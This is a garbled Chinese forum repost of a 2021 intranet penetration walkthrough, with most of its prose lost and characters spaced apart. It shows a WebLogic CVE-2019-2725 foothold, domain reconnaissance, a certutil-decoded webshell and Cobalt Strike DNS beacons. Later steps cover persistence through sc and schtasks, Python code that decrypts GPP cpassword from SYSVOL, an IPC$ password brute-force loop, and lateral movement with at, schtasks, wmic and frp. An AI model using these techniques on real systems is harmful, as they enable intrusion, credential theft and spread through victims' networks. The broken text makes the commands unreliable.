[21804] 2021-03-24_内网渗透

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-03-24_内网渗透   L e m o n S e c   2 0 2 1 - 0 3 - 2 4 , , , 线 线 i p : w i p 1 w e b l o g i c , C V E - 2 0 1 9 - 2 7 2 5   i p c o n f i g   / a l l   : g x x x x x x x x x . c o m w h o a m i   / a l l   s y s t e m h t t p : / / w i p 1 / , w e b l o g i c
n e t   u s e r   / d o m a i n   ( ) n e t   g r o u p   " d o m a i n   a d m i n s "   / d o m a i n           a d m i n i s t r a t o r n e t   g r o u p   " d o m a i n   c o m p u t e r s "   / d o m a i n   n e t   g r o u p   " d o m a i n   c o n t r o l l e r s "   / d o m a i n   , p i n g   3 i p
t a s k l i s t   ( ) N e t s t a t   - a n o   a r p   - a   i p q u e r y   u s e r   | |   q w i n s t a     ( w i p 1 / a d m i n i s t r a t o r ) 1 .   2 i p   1 9 2 . x x . x x . x 5 1 0 . x x . x x . x x         1 9 2 . x x . x x . x x 2 .   i p 1 9 2 . x x . x x . x 3       1 9 2 . x x . x x . x 2   1 0 . x x . x x . x 2 3 .   便 , b a s e 6 4 j s p ( )
c e r t u t i l   : C e r t u t i l     - d e c o d e   a . t x t   a . j s p C S   线 线 , p i n g   p i n g   d n s s h e l l c o d e 线 d n s c s
S t a g e l e s s   s h e l l c o d e ,   线 线 i p :   1 9 2 . x x . x x . x 5   线 线   s c   c r e a t e   " x x x "   b i n p a t h =   " c m d   / c   s t a r t   " C : / w i n d o w s / t e m p / x x x . b a t " " & & s c   c o n f i g   " x x x "   s t a r t =   a u t o & & n e t   s t a r t     x x x s c h t a s k s   / c r e a t e   / t n   " x x x "   / t r   " C : / w i n d o w s / t e m p / x x x . b a t "   / s c   w e e k l y   / m o   1     / r u   s y s t e m s c h t a s k s   / r u n   / t n   " x x x "
线 g p p s h e l l   d i r   s y s v o l p a s s w o r d s h e l l   f i n d s t r   / s   / i   / m   / c : " p a s s w o r d "     S Y S V O L P o l i c i e s * . x m l s h e l l   t y p e   i m p o r t   s y s f r o m   C r y p t o . C i p h e r   i m p o r t   A E S f r o m   b a s e 6 4   i m p o r t   b 6 4 d e c o d e
l o a g o n p a s s w o r d s   , a d m i n i s t r a t o r r d p , ( , ) i p 1 .   d o m a i n   c o m p u t e r s       +   p i n g 2 .   S p n + p i n g s e t s p n   - t   / d o m a i n   - q     * / *     >   s p n . t x t d n s   p i n g ,       d o m a i n   c o m p u t e r s     k e y   =   " " " 4 e   9 9   0 6   e 8     f c   b 6   6 c   c 9     f a   f 4   9 3   1 0     6 2   0 f   f e   e 8 f 4   9 6   e 8   0 6     c c   0 5   7 9   9 0     2 0   9 b   0 9   a 4     3 3   b 6   6 c   1 b " " " . r e p l a c e ( "   " , " " ) . r e p l a c e ( " n " , " " ) . d e c o d e ( ' h e x ' ) c p a s s w o r d   =   " " c p a s s w o r d   + =   " = "   *   ( ( 4   -   l e n ( c p a s s w o r d )   %   4 )   %   4 ) p a s s w o r d   =   b 6 4 d e c o d e ( c p a s s w o r d ) o   =   A E S . n e w ( k e y ,   A E S . M O D E _ C B C ,   " x 0 0 "   *   1 6 ) . d e c r y p t ( p a s s w o r d ) p r i n t   o [ : - o r d ( o [ - 1 ] ) ] . d e c o d e ( ' u t f 1 6 ' )
,   p i n g   1 9 2 , 1 9 2 1 9 2   c s p s e x e c   线 a d m i n i s t r a t o r   f o r   / L   % I   i n   ( 1 , 1 , 2 5 4 )   d o     @ n e t   u s e   1 9 2 . x x . x x . % I i p c $     " "       / u s e r : a d m i n i s t r a t o r ( i p w e b s h e l l ) s h e l l   t a s k l i s t   / s     i p       / v 1 9 2 . x x . x x . x 0   c o p y   s h e l l c o d e   i p c
a t   线 s h e l l   n e t   t i m e   i p 2   s h e l l   a t   t i m e   i p     1 2 : 5 7   x x x . b a t 线 d n s s h e l l   s m b   , ,   h t t p   ( c s I P ) 线 , 线 , a t   ( ) . . . . . . , s c h t a s k s s c h t a s k s   / c r e a t e     / F   / s   1 9 2 . x x . x x . x 0   / u   a d m i n i s t r a t o r   / p     " "       / t n   t e s t     / t r   " c : w i n d o w s t e m p x x x x x . b a t "       / s c   D A I L Y   / m o   1   / s t   1 3 : 2 0 线 2 , 1 9 2 . x x . x x . x 0   , h a s h , g x x x x x x x x x x x a d m i n i s t r a t o r , w m i c s h e l l   w m i c   / n o d e : 1 9 2 . x x . x x . x 3       p r o c e s s   c a l l   c r e a t e   " c m d . e x e   / c   w h o a m i > f : x x x x x x r e s u l t . t x t "
c o p y   s h e l l c o d e   i p c , 线 , f r p   便 访 w e b L e m o n S e c s h e l l   w m i c   / n o d e : 1 9 2 . x x . x x . x 3     p r o c e s s   c a l l   c r e a t e   " c m d . e x e   / c   f : x x x x x x x . b a t "
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则